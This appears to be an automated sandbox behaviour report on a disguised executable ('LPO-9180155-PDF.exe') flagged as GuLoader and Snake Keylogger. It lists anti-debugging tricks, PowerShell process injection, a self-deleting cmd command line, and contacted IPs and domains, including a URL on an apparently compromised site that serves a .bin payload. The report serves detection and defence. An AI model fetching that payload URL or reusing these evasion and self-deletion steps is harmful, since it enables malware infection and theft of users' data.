Source: Forbundsstater.exe, 00000006.00000002.2662544799.0000000005589000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Thread information set: HideFromDebugger Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Code function: 6_2_004062BE LdrInitializeThunk,WideCharToMultiByte,GetProcAddress, 6_2_004062BE
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Code function: 0_2_00406252 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406252
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe base: 1700000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe base: 19FFF4 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe "C:\Users\user\AppData\Local\Temp\Forbundsstater.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\Forbundsstater.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\LPO-9180155-PDF.exe Code function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_00405F0A
Source: C:\Users\user\AppData\Local\Temp\Forbundsstater.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000006.00000002.2674791850.0000000021461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Forbundsstater.exe PID: 7032, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000006.00000002.2674791850.0000000021461000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Forbundsstater.exe PID: 7032, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1481498 Sample: LPO-9180155-PDF.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 36 reallyfreegeoip.org 2->36 38 checkip.dyndns.org 2->38 40 2 other IPs or domains 2->40 48 Found malware configuration 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 Yara detected GuLoader 2->52 56 3 other signatures 2->56 10 LPO-9180155-PDF.exe 1 16 2->10         started        signatures3 54 Tries to detect the country of the analysis system (by using the IP) 36->54 process4 file5 30 C:\Users\user\AppData\Local\...\Fernland.Reg, ASCII 10->30 dropped 64 Suspicious powershell command line found 10->64 14 powershell.exe 20 10->14         started        signatures6 process7 file8 32 C:\Users\user\AppData\...\Forbundsstater.exe, PE32 14->32 dropped 34 C:\...\Forbundsstater.exe:Zone.Identifier, ASCII 14->34 dropped 66 Writes to foreign memory regions 14->66 68 Found suspicious powershell code related to unpacking or dynamic code loading 14->68 70 Hides threads from debuggers 14->70 72 Powershell drops PE file 14->72 18 Forbundsstater.exe 15 10 14->18         started        22 conhost.exe 14->22         started        signatures9 process10 dnsIp11 42 reallyfreegeoip.org 188.114.97.3, 443, 59961, 59962 CLOUDFLARENETUS European Union 18->42 44 checkip.dyndns.com 132.226.247.73, 59960, 59963, 59965 UTMEMUS United States 18->44 46 www.reap.skyestates.com.mt 108.167.181.251, 443, 59959 UNIFIEDLAYER-AS-1US United States 18->46 58 Multi AV Scanner detection for dropped file 18->58 60 Hides threads from debuggers 18->60 62 Switches to a custom stack to bypass stack traces 18->62 24 cmd.exe 1 18->24         started        signatures12 process13 process14 26 conhost.exe 24->26         started        28 choice.exe 1 24->28         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
188.114.97.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
108.167.181.251
 www.reap.skyestates.com.mt United States
46606 UNIFIEDLAYER-AS-1US false
132.226.247.73
 checkip.dyndns.com United States
16989 UTMEMUS false

Contacted Domains

Name IP Active
www.reap.skyestates.com.mt 108.167.181.251 true
reallyfreegeoip.org 188.114.97.3 true
checkip.dyndns.com 132.226.247.73 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://checkip.dyndns.org/ false
  • URL Reputation: safe
 unknown
https://www.reap.skyestates.com.mt/wp-includes/IoNHObzRr183.bin false
  • Avira URL Cloud: safe
 unknown
https://reallyfreegeoip.org/xml/8.46.123.33 false
  • URL Reputation: safe
 unknown